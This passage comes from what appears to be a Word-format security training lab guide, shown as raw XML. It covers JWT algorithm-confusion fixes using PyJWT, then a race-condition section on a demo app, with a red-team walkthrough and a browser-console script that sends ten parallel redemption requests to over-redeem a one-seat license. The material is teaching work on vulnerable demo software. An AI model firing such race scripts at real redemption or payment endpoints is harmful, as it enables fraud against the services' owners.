              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Manual JWT implementations frequently have subtle bugs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Use PyJWT with algorithm enforcement: jwt.decode(token, key, algorithms=["RS256"])</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Use PyJWT — install: pip3 install PyJWT cryptography
import jwt
# Sign:
token = jwt.encode(payload, PRIVATE_KEY, algorithm="RS256")
# Verify — algorithms list is enforced server-side:
try:
    data = jwt.decode(token, PUBLIC_KEY, algorithms=["RS256"])  # ONLY RS256 accepted
except jwt.exceptions.InvalidAlgorithmError:
    return None  # HS256 or none algorithm rejected automatically</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A6F1E" w:sz="1"/>
              <w:left w:val="single" w:color="CA6F1E" w:sz="14"/>
              <w:bottom w:val="single" w:color="CA6F1E" w:sz="1"/>
              <w:right w:val="single" w:color="CA6F1E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="CA6F1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Real-World Impact</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2015-9235 affected dozens of JWT libraries. Attackers exploited this in auth services of major SaaS platforms. The "alg:none" variant (no signature at all) was used to bypass auth in real production systems. This class of bug affects any service that trusts the token's algorithm claim.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C8D6E5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="40" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pP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0"/>
        <w:gridCol w:w="8620"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="740"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">V5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8620"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Race Condition — License Over-Redemption</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Advanced ]</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276" w:sz="1"/>
              <w:left w:val="single" w:color="1A5276" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="1"/>
              <w:right w:val="single" w:color="1A5276" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📖  What Is This Vulnerability?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">A race condition (TOCTOU — Time Of Check, Time Of Use) occurs when a resource check and its subsequent action are non-atomic. The license redemption route checks seat availability, then sleeps 150ms (simulating DB latency), then increments. Multiple concurrent requests can all pass the check before any increment occurs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴  RED TEAM — ATTACK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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Understand the license system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Navigate to Licenses — you can see DEMO-FREE-0001 has only 1 seat total.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Normal flow: check used_seats &lt; total_seats → sleep 150ms → increment used_seats.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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The 150ms window means multiple parallel requests can ALL see 0 used before any update!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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Send one request — it succeeds normally</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Enter license code: DEMO-FREE-0001 and click "Redeem →"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Seat 1/1 redeemed — now used_seats = 1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Try again — "All seats used" — correctly blocked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Click ↻ to reset: we need to try the race attack on a fresh license.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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Launch 10 parallel requests simultaneously</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "🚀 Race Attack — 10 Parallel Requests" button.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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The UI sends 10 fetch() requests simultaneously using Promise.all().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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All 10 hit the server within milliseconds — all see used_seats=0 (before any update).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Multiple requests succeed — used_seats goes above 1 for a 1-seat license!</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// Race condition attack — paste in browser console:
async function raceAttack(code, n=10) {
  const results = await Promise.all(
    Array(n).fill().map(() =&gt;
      fetch("/api/licenses/redeem", {
        method: "POST",
        headers: {"Content-Type":"application/json", "Authorization":"Bearer YOUR_TOKEN"},
        body: JSON.stringify({code})
      }).then(r =&gt; r.json())
    )
  );
  const wins = results.filter(r =&gt; r.success);
  console.log(`Won ${wins.length}/${n} — Seats: ${wins.map(r=&gt;r.seat_number)}`);
}
raceAttack("DEMO-FREE-0001", 10);</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
